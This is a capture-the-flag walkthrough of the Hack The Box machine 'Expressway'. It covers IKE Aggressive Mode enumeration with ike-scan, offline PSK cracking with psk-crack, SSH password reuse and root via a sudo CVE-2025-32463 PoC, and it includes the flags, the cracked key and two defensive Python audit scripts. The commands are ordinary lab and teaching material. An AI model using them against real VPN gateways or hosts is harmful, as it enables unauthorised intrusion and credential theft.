Port Scanning

┌──(kali㉿kali)-[~/HTB/expressway]
└─$ sudo nmap -p- --min-rate 10000 10.10.11.87 -oA ports
[sudo] password for kali:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-12-05 19:23 CST
Nmap scan report for 10.10.11.87
Host is up (0.072s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh

Nmap done: 1 IP address (1 host up) scanned in 10.66 seconds

Three full TCP scans showed only SSH open, so I moved on to a UDP scan:

┌──(kali㉿kali)-[~/HTB/expressway]
└─$ sudo nmap -sU --top-ports 20 10.10.11.87 -oA udp
Starting Nmap 7.95 ( https://nmap.org ) at 2025-12-05 19:25 CST
Nmap scan report for 10.10.11.87
Host is up (0.072s latency).

PORT STATE SERVICE
53/udp closed domain
67/udp closed dhcps
68/udp open|filtered dhcpc
69/udp open|filtered tftp
123/udp open|filtered ntp
135/udp open|filtered msrpc
137/udp open|filtered netbios-ns
138/udp closed netbios-dgm
139/udp open|filtered netbios-ssn
161/udp open|filtered snmp
162/udp closed snmptrap
445/udp open|filtered microsoft-ds
500/udp open isakmp
514/udp closed syslog
520/udp open|filtered route
631/udp closed ipp
1434/udp open|filtered ms-sql-m
1900/udp open|filtered upnp
4500/udp open|filtered nat-t-ike
49152/udp open|filtered unknown

Nmap done: 1 IP address (1 host up) scanned in 1.53 seconds

Port 500/udp is open. I was not very familiar with the service that usually listens there, so I ran a detailed version and script scan against just that port:

┌──(kali㉿kali)-[~/HTB/expressway]
└─$ sudo nmap -sU -sC -sV -O -p 500 10.10.11.87 -oA details
[sudo] password for kali:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-12-05 19:56 CST
Nmap scan report for 10.10.11.87
Host is up (0.070s latency).

PORT STATE SERVICE VERSION
500/udp open isakmp?
| ike-version:
| attributes:
| XAUTH
|_ Dead Peer Detection v1.0
Too many fingerprints match this host to give specific OS details
Network Distance: 2 hops

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 130.49 seconds

Attacking IKE

The scan returned an ike-version script result. I handed that output to an AI assistant, which said the host is running an ISAKMP/IKE service that supports XAUTH (commonly used for username/password authentication).

A quick search taught me that IKE (Internet Key Exchange) is the key-management protocol built on ISAKMP (Internet Security Association and Key Management Protocol) that IPsec uses to negotiate its tunnels; it is commonly found on VPN gateways, firewalls and similar devices.

The AI also suggested using the ike-scan tool to enumerate the service further.

┌──(kali㉿kali)-[~/HTB/expressway]
└─$ ike-scan -M --aggressive 10.10.11.87
Starting ike-scan 1.9.6 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.10.11.87 Aggressive Mode Handshake returned
HDR=(CKY-R=aa1005bc157f41e5)
SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
KeyExchange(128 bytes)
Nonce(32 bytes)
ID(Type=ID_USER_FQDN, Value=ike@expressway.htb)
VID=09002689dfd6b712 (XAUTH)
VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0)
Hash(20 bytes)

Ending ike-scan 1.9.6: 1 hosts scanned in 0.087 seconds (11.46 hosts/sec). 1 returned handshake; 0 returned notify

From this result we obtained an identity (ike@expressway.htb), XAUTH support, PSK authentication and other details. The fact that the peer answered an aggressive-mode proposal with a handshake at all means its IKE implementation accepts Aggressive Mode.

IKEv1 phase 1 has two modes: Main Mode and Aggressive Mode. In Main Mode the identities and the authentication hash are exchanged only after an encrypted channel exists; in Aggressive Mode they are sent in plaintext, which is why an unauthenticated scanner can read this important information.

The most important item is the PSK (pre-shared key). With ike-scan we can capture the aggressive-mode handshake, which contains a hash derived from this key, and then try to crack it offline. If the PSK can be cracked, we could try to establish a VPN connection to the target and reach its internal network.
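As an added example (editor's code, not part of the original write-up), the following Python audit parses the ike-scan -M output shown above and turns the handshake into defender findings: Aggressive Mode, weak SA attributes, identity disclosure and XAUTH. The sample text and the weak-attribute table are constructed from the page's own output.

```python
import re

# Constructed sample: the ike-scan -M --aggressive output shown in this write-up,
# reduced to the lines the audit needs (copied from the page, not live output).
SAMPLE_IKE_SCAN = """\
10.10.11.87 Aggressive Mode Handshake returned
HDR=(CKY-R=aa1005bc157f41e5)
SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
ID(Type=ID_USER_FQDN, Value=ike@expressway.htb)
VID=09002689dfd6b712 (XAUTH)
VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0)
"""

# SA attribute values a defender should flag, with the remediation.
WEAK = {
    "Enc": {"3DES": "deprecated 64-bit block cipher; use AES-GCM or AES-256-CBC"},
    "Hash": {"SHA1": "deprecated PRF/integrity; use SHA-256 or stronger"},
    "Group": {"2:modp1024": "1024-bit DH is below today's minimum; use group 14+ or ECP"},
    "Auth": {"PSK": "PSK in Aggressive Mode is crackable offline; use certificates, "
                    "EAP or IKEv2, and never a dictionary word"},
}

def parse_ike_scan(text):
    """Extract mode, SA attributes, peer ID and vendor-ID names from ike-scan -M output."""
    result = {"aggressive": False, "sa": {}, "id": None, "vids": []}
    for line in text.splitlines():
        line = line.strip()
        if "Aggressive Mode Handshake returned" in line:
            result["aggressive"] = True
        elif (m := re.match(r"SA=\((.*)\)$", line)):
            result["sa"] = dict(kv.split("=", 1) for kv in m.group(1).split())
        elif (m := re.match(r"ID\(Type=(\w+), Value=(.+)\)$", line)):
            result["id"] = (m.group(1), m.group(2))
        elif (m := re.match(r"VID=[0-9a-f]+ \((.+)\)$", line)):
            result["vids"].append(m.group(1))
    return result

def audit(parsed):
    """Turn a parsed handshake into a list of human-readable findings."""
    findings = []
    if parsed["aggressive"]:
        findings.append("Aggressive Mode accepted: peer ID and HASH_R travel unencrypted")
    for attr, value in parsed["sa"].items():
        reason = WEAK.get(attr, {}).get(value)
        if reason:
            findings.append(f"{attr}={value}: {reason}")
    if parsed["id"]:
        findings.append(f"identity disclosed to unauthenticated peers: {parsed['id'][1]}")
    if "XAUTH" in parsed["vids"]:
        findings.append("XAUTH advertised: user logins sit behind the same weak group PSK")
    return findings
```

Run `audit(parse_ike_scan(SAMPLE_IKE_SCAN))` to list the findings; on a gateway you administer, disabling Aggressive Mode (or moving to IKEv2 with certificate or EAP authentication) removes the first and most serious one.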

Next, use ike-scan to try to capture the PSK hash:

┌──(kali㉿kali)-[~/HTB/expressway]
└─$ ike-scan -M -A --id=ike@expressway.htb -Pexpressway_hash.txt 10.10.11.87
Starting ike-scan 1.9.6 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.10.11.87 Aggressive Mode Handshake returned
HDR=(CKY-R=2147a070b5a0a367)
SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
KeyExchange(128 bytes)
Nonce(32 bytes)
ID(Type=ID_USER_FQDN, Value=ike@expressway.htb)
VID=09002689dfd6b712 (XAUTH)
VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0)
Hash(20 bytes)

Ending ike-scan 1.9.6: 1 hosts scanned in 0.172 seconds (5.83 hosts/sec). 1 returned handshake; 0 returned notify

┌──(kali㉿kali)-[~/HTB/expressway]
└─$ cat expressway_hash.txt
538735f51c15ec8bd796c471fccb8b618376e3555b916aff380a1af0026a4523261afa2126bab734d4183c77dbf60a496082fa6a4e3731a45a6095cba52ce98b5ca314629c79b51583a4de8ddc0e0de0307a05bd3d08449d89277cd01b1ba38cae817ff082f595e564060512dace2e5239b67d3b5b660779b5290a44b396f49b:6460276676b1fc8cc2d74fb399eb11897aef438eb771ae24a22eb627bfb336feeb9b9066b3ec6ca23d2c925bdf49e56d482e35147351826175b5c64a8f24a695344f733a6b4f33e003b095e9722b8efc12fc9c62990fd380ac88b193e19f6766438373c9d376856aa337adb60a2a992dd2799f9cee6114a5edf8671e16766b0a:2147a070b5a0a367:732e5df69cd787e1:00000001000000010000009801010004030000240101000080010005800200028003000180040002800b0001000c000400007080030000240201000080010005800200018003000180040002800b0001000c000400007080030000240301000080010001800200028003000180040002800b0001000c000400007080000000240401000080010001800200018003000180040002800b0001000c000400007080:03000000696b6540657870726573737761792e687462:c02d5a9ab7fc6d4897b58737cad7cfd2b5234e97:abedad85ff74d22899fe682197106943c891fd5c68c39846ed1c03b4dd169fee:1a872010570203273da0c6ee3ad716d940bb0524

The PSK hash has been saved, so next we try to crack it with psk-crack:

┌──(kali㉿kali)-[~/HTB/expressway]
└─$ psk-crack -d /usr/share/wordlists/rockyou.txt expressway_hash.txt
Starting psk-crack [ike-scan 1.9.6] (http://www.nta-monitor.com/tools/ike-scan/)
Running in dictionary cracking mode
key "freakingrockstarontheroad" matches SHA1 hash 1a872010570203273da0c6ee3ad716d940bb0524
Ending psk-crack: 8045040 iterations in 2.673 seconds (3009289.29 iterations/sec)

The PSK has been cracked: freakingrockstarontheroad.

Getting a Foothold

Recalling the ID ike@expressway.htb seen earlier, ike may be a valid user on the target and freakingrockstarontheroad may be his SSH password, so we try logging in over SSH:

┌──(kali㉿kali)-[~/HTB/expressway]
└─$ ssh ike@expressway.htb
The authenticity of host 'expressway.htb (10.10.11.87)' can't be established.
ED25519 key fingerprint is SHA256:fZLjHktV7oXzFz9v3ylWFE4BS9rECyxSHdlLrfxRM8g.
This host key is known by the following other names/addresses:
~/.ssh/known_hosts:80: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'expressway.htb' (ED25519) to the list of known hosts.
ike@expressway.htb's password:
Linux expressway.htb 6.16.7+deb14-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.16.7-1 (2025-09-11) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
ike@expressway:~$

The login succeeded, and we get the user flag:

2fe01866e793fabeee44d776849903d2

Privilege Escalation

After uploading linpeas.sh to the target and running it, I saw that the sudo version is 1.9.17. A web search showed that this version of sudo has the local privilege escalation vulnerability CVE-2025-32463, so I used its PoC to escalate:

ike@expressway:/tmp$ vi exp.sh
ike@expressway:/tmp$ chmod +x exp.sh
ike@expressway:/tmp$ ./exp.sh
woot!
root@expressway:/# id
uid=0(root) gid=0(root) groups=0(root),13(proxy),1001(ike)
root@expressway:/# cd /root
root@expressway:/root# ls
root.txt
root@expressway:/root# cat root.txt
46e5454dcbf6bf7bfc15326179e33439
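As an added defender-side check (editor's code, not from the write-up), the following Python snippet parses `sudo --version` output and reports whether the upstream version falls in the range affected by CVE-2025-32463. The affected range (1.9.14 through 1.9.17, fixed in 1.9.17p1) is the editor's reading of the sudo advisory and is not stated on the page; distributions often backport the fix without changing the version string, so a verdict from the version alone is a lead to confirm against the package changelog, not proof.

```python
import re

# Affected range for CVE-2025-32463 as the editor understands the sudo advisory:
# 1.9.14 up to and including 1.9.17, fixed in 1.9.17p1 (not stated on the page).
FIRST_AFFECTED = (1, 9, 14, 0)
FIRST_FIXED = (1, 9, 17, 1)

# Constructed sample outputs of `sudo --version` (only the first line matters).
SAMPLE_VULNERABLE = "Sudo version 1.9.17\nSudoers policy plugin version 1.9.17\n"
SAMPLE_PATCHED = "Sudo version 1.9.17p1\nSudoers policy plugin version 1.9.17p1\n"

def parse_sudo_version(text):
    """Turn 'Sudo version 1.9.17p1' into (1, 9, 17, 1). A missing 'pN' suffix is
    level 0, so 1.9.17 sorts below 1.9.17p1 as it should."""
    m = re.search(r"Sudo version (\d+)\.(\d+)\.(\d+)(?:p(\d+))?", text)
    if not m:
        raise ValueError("no 'Sudo version' line found")
    major, minor, patch, plevel = m.groups()
    return (int(major), int(minor), int(patch), int(plevel or 0))

def is_vulnerable_cve_2025_32463(version):
    """True when the upstream version tuple falls inside the affected range."""
    return FIRST_AFFECTED <= version < FIRST_FIXED

def check_sudo(text):
    """Return a one-line verdict for one host's `sudo --version` output."""
    version = parse_sudo_version(text)
    label = ".".join(map(str, version[:3])) + (f"p{version[3]}" if version[3] else "")
    if is_vulnerable_cve_2025_32463(version):
        return (f"sudo {label}: upstream version affected by CVE-2025-32463; "
                "upgrade to 1.9.17p1 or confirm a distro backport")
    return f"sudo {label}: not in the affected range"
```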